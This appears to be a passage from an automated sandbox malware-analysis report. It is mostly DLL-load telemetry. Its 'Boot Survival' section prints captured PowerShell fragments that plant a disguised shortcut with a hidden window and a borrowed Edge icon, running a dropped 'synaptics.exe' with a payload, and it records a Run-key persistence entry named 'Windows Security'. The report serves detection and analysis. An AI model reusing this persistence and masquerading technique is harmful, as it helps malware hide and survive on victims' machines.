      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: ndfapi.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wdi.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: duser.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: atlthunk.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: aepic.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dxgi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wtsapi32.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.ui.fileexplorer.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: winmm.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
      Source: C:\Windows\explorer.exeSection loaded: networkexplorer.dllJump to behavior
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: winload_prod.pdb87456555183400_C3B2669B-4862-44CB-BCC1-701EAE43EADE.logg source: explorer.exe, 00000012.00000003.2413376307.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Roamingwinload_prod.pdb87456555183400_C3B2669B-4862-44CB-BCC1-701EAE43EADE.logg source: explorer.exe, 00000012.00000003.2413490533.0000000000D3E000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: winload_prod.pdbe-8dfa-9938ebc29c814743-B9C8-E1FB294AE265.log0000000000000002.regtrans-ms source: explorer.exe, 00000012.00000003.2413157720.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2413212565.0000000000D50000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ntkrnlmp.pdb-4f1e-8dfa-9938ebc29c814743-B9C8-E1FB294AE265.log0000000000000002.regtrans-ms source: explorer.exe, 00000012.00000003.2413157720.0000000000D50000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2413212565.0000000000D50000.00000004.00000020.00020000.00000000.sdmp

      Boot Survival

      barindex
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Security
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk");$link.WindowStyle = 7;$link.TargetPath = "$env:LOCALAPPDATA\EAnLaxUKaI\synaptics.exe";$link.IconLocation = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,13";$link.Arguments = "-c `"$payload`"";$link.Save() [System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is "System.Management.Automation.CommandNotFoundException")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(".", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion prompt$global:
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk' -Force @{GUID="EEFCB906-B326-4E99-9F54-8B4BB6EF3C6D"Author="Microsoft Corporation"CompanyName="Microsoft Corporation"Copyright=" Microsoft Corporation. All rights reserved."ModuleVersion="3.1.0.0"PowerShellVersion="5.1"CLRVersion="4.0"NestedModules="Microsoft.PowerShell.Commands.Management.dll"HelpInfoURI = 'https://go.microsoft.com/fwlink/?linkid=390785'AliasesToExport = @("gcb", "scb", "gin", "gtz", "stz")FunctionsToExport = @()CmdletsToExport=@("Add-Content", "Clear-Content", "Clear-ItemProperty", "Join-Path", "Convert-Path", "Copy-ItemProperty", "Get-EventLog", "Clear-EventLog", "Write-EventLog", "Limit-EventLog", "Show-EventLog", "New-EventLog", "Remove-EventLog", "Get-ChildItem", "Get-Content", "Get-ItemProperty", "Get-ItemPropertyValue", "Get-WmiObject", "Invoke-WmiMethod", "Move-ItemProperty", "Get-Location", "Set-Location", "Push-Location", "Pop-Location", "New-PSDrive", "Remove-PSDrive", "Get-PSDrive", "Get-Item", "New-Item", "Set-Item", "Remove-Item", "Move-Item", "Rename-Item", "Copy-Item", "Clear-Item", "Invoke-Item", "Get-PSProvider", "New-ItemProperty", "Split-Path", "Test-Path", "Get-Process", "Stop-Process", "Wait-Process", "Debug-Process", "Start-Process", "Remove-ItemProperty", "Remove-WmiObject", "Rename-ItemProperty", "Register-WmiEvent", "Resolve-Path", "Get-Service", "Stop-Service", "Start-Service", "Suspend-Service", "Resume-Service", "Restart-Service", "Set-Service", "New-Service", "Set-Content", "Set-ItemProperty", "Set-WmiInstance", "Get-Transaction", "Start-Transaction", "Complete-Transaction", "Undo-Transaction", "Use-Transaction", "New-WebServiceProxy", "Get-HotFix", "Test-Connection", "Enable-ComputerRestore", "Disable-ComputerRestore", "Checkpoint-Computer", "Get-ComputerRestorePoint", "Restart-Computer", "Stop-Computer", "Restore-Computer", "Add-Computer", "Remove-Computer", "Test-ComputerSecureChannel", "Reset-ComputerMachinePassword", "Rename-Computer", "Get-ControlPanelItem", "Show-ControlPanelItem", "Clear-Recyclebin", "Get-Clipboard", "Set-Clipboard", "Get-ComputerInfo", "Get-TimeZone", "Set-TimeZone")CompatiblePSEditions = @('Desktop','Core')} [System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is "System.Management.Automation.CommandNotFoundException")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(".", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion prompt$global:
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Security
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Security
      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
